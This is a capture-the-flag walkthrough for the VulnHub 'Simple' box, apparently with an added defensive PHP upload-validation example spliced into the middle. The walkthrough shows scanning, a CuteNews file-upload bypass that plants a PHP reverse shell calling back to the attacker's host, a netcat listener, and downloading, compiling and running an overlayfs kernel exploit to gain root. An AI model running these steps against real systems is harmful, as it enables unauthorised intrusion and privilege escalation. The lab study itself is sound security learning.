BNE0x03 – Simple

Compared to the last VulnHub box, this one is very simple and quick to root.

You can download the VM here

DESCRIPTION

Simple CTF is a boot2root that focuses on the basics of web based hacking. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. /root/flag.txt is your ultimate goal.

MAPPING THE TARGET

Firstly, we need to find the IP of our target:

[email protected]:~$ sudo netdiscover
Currently scanning: 192.168.10.0/16   |   Screen View: Unique Hosts

8 Captured ARP Req/Rep packets, from 8 hosts.   Total size: 480
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.1.27    00:0c:29:6d:14:f6      1      60  VMware, Inc.

Then we need to find which ports are open:

[email protected]:~$ sudo nmap -A -T4 -p- 192.168.1.27

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-18 05:40 EST
Nmap scan report for 192.168.1.27
Host is up (0.00058s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Please Login / CuteNews

EXPLOITING

Okay, so all we have is Apache running a PHP application called CuteNews. If we visit the page, we can see in the footer that the version it’s running is quite old:

Powered by CuteNews 2.0.3 © 2002–2014 CutePHP.
(unregistered)

A search on exploit-db revealed an arbitrary file upload vulnerability we should be able to leverage. I created a new user called test, logged in and clicked on Personal Options. Using a copy of this reverse shell, I edited the required parts to point back to my kali VM and renamed the file extension to .jpg.

$ip = '192.168.0.21';  // CHANGE THIS
$port = 443;       // CHANGE THIS

I launched Burp Suite’s proxy interception tool and uploaded the reverse shell, replacing the extension with .php so it could be called later on.

burp

Step 6 in the exploit-db guide tells us that the shell will now be located in the /uploads/ directory, so I fired up netcat and browsed to that location.
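The upload bypass above works because the application accepts whatever filename arrives in the request, so swapping .jpg back to .php in Burp is enough. As an added example (not CuteNews code), here is the server-side check that closes that gap: the type is sniffed from the bytes, the extension is chosen by the server, and the client-supplied name never reaches the filesystem. The field name "avatar" and the upload directory are assumptions.

```php
<?php
// Added example, not part of CuteNews. Server-side validation for an avatar
// upload. Assumes a form field named "avatar" and an upload directory that is
// either outside the web root or served with PHP execution disabled.

declare(strict_types=1);

// Detected MIME type => extension the server will assign.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate one $_FILES entry and return a sanitised target filename.
 * The client-supplied name and $file['type'] are never trusted: both are
 * attacker-controlled, which is exactly what the intercepted request abuses.
 */
function validateAvatarUpload(array $file, int $maxBytes = 512 * 1024): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with code ' . $file['error']);
    }
    if ($file['size'] > $maxBytes) {
        throw new RuntimeException('file too large');
    }
    // Sniff the content instead of reading the extension.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException("rejected content type: $mime");
    }
    // A PHP script with a forged image header will not decode as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('file is not a decodable image');
    }
    // Random name plus server-chosen extension: no user input in the path,
    // so even an image/PHP polyglot is never stored as *.php.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
}

function storeAvatar(array $file, string $uploadDir): string
{
    $dest = rtrim($uploadDir, '/') . '/' . validateAvatarUpload($file);
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

// Usage in the handler: $path = storeAvatar($_FILES['avatar'], '/var/app/avatars');
```

Pair this with an Apache rule such as `php_admin_flag engine off` on the upload directory, so that a validation miss still cannot turn an upload into code execution.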

[email protected]:~$ sudo nc -lvp 443
listening on [any] 443 ...
192.168.1.27: inverse host lookup failed: Unknown host
connect to [192.168.1.21] from (UNKNOWN) [192.168.1.27] 57457
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
 06:49:17 up  1:12,  0 users,  load average: 0.29, 0.14, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Then I gained a bash shell with the following Python snippet:

python -c 'import pty;pty.spawn("/bin/bash")'

I spent a lot of time poking around and trying to find a hint of what needed to be done next. After an hour or two I noticed the kernel was fairly old and it was vulnerable to an overlayfs exploit:

www-data@simple:/$ uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux

So I downloaded the exploit to the /tmp/ directory, compiled it, made it executable and ran it to gain a root shell:

www-data@simple:/tmp$ wget  https://exploit-db.com/download/37292

--2017-01-18 07:04:57--  https://exploit-db.com/download/37292
Resolving exploit-db.com (exploit-db.com)... 192.124.249.8
Connecting to exploit-db.com (exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [application/txt]
Saving to: '37292'

100%[======================================>] 5,123       --.-K/s   in 0s      

2017-01-18 07:05:03 (336 MB/s) - '37292' saved [5123/5123]

www-data@simple:/tmp$ mv 37292 37292.c

www-data@simple:/tmp$ gcc 37292.c -o ofs

www-data@simple:/tmp$ chmod +x ofs

www-data@simple:/tmp$ ./ofs

spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library

# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# 

And from there I was able to read the flag:

# cd  /root
# cat  flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!